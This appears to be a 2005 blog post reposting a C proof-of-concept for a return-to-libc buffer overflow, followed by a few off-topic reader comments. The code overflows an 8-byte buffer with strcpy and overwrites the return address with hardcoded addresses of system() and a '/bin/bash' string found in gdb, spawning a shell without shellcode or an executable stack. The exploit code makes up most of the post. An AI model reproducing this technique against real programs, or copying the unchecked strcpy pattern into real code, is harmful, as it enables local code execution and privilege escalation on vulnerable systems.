Friday Oct 21, 2005

0
We don't need no stinkin SHELLCODE or executable stack MUtha Focker

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
* using system() so that we don't need shellcode or an executable stack
*
* Victim code must use system() and must have a useful command name as a
* string somewhere we can find, such as the SHELL environment variable.
*/
int myfunc(char *cp)
{
char lame[8];
strcpy(lame,cp);
return 0;
}

int main(int argc, char **argv, char **envp)
{
char nasty[]="@@@@@@@@@@@@@@@@@@@@6789";

/* system() at 0x0804841c from gdb's "print system" */
nasty[12]=0x1c;
nasty[13]=0x84;
nasty[14]=0x04;
nasty[15]=0x08;
/***************/
/* "/bin/bash" in the environment, found with gdb's "x" */
nasty[20]=0xb7;
nasty[21]=0xff;
nasty[22]=0xff;
nasty[23]=0xbf;

myfunc(nasty);

/* expect a seg fault after the exploit */

printf("program not smashedn");
exit(0);
return system("date");
}

--
##############################################################
# Antonomasia ant@notatla.demon.co.uk #
# See http://www.notatla.demon.co.uk/ #
##############################################################
VIEW 3 of 3 COMMENTS
l7rules:
Woo Hoo double post biggrin biggrin biggrin biggrin biggrin biggrin biggrin biggrin

[Edited on Oct 22, 2005 1:48AM]
jj_r0x0rz:
wtf!?!?!?! insane!!!! my eyes are brown... i have a double identity...my eyes turn blue when i drink large amounts of alcohol...tis a mystery never solved

More Blogs